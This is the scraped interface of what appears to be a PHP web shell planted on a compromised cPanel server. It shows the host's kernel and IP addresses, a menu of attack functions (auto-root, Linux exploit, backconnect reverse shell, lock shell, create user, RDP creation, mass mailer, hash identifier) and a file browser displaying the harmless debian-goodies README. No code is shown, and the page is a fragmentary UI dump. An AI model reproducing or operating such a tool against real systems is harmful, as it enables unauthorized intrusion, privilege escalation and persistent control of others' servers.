Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.130.206
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
debian-goodies /
[ HOME SHELL ]
Name
Size
Permission
Action
README
693
B
-rw-r--r--
changelog.gz
2.24
KB
-rw-r--r--
copyright
38.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
There is no substantial documentation yet. Volunteer authors are more than welcome. Here are some examples to get you started. # Search all files in specified packages for a regex $ dgrep <pattern> <package>... # Search through all files in all installed packages for a regex $ dgrep <pattern> '.*' # Same, but also search inside compressed files $ dzgrep <pattern> '.*' # Calculate the total disk space usage of all files contained in all # installed packages whose names begin with 'lib' $ dglob -0f ^lib | xargs -0 du -c | awk '{sum += $1} END {print sum}' # Fetch most recent version of package $ debget <package> # Fetch a specific version of package $ debget <package>=<version>
Close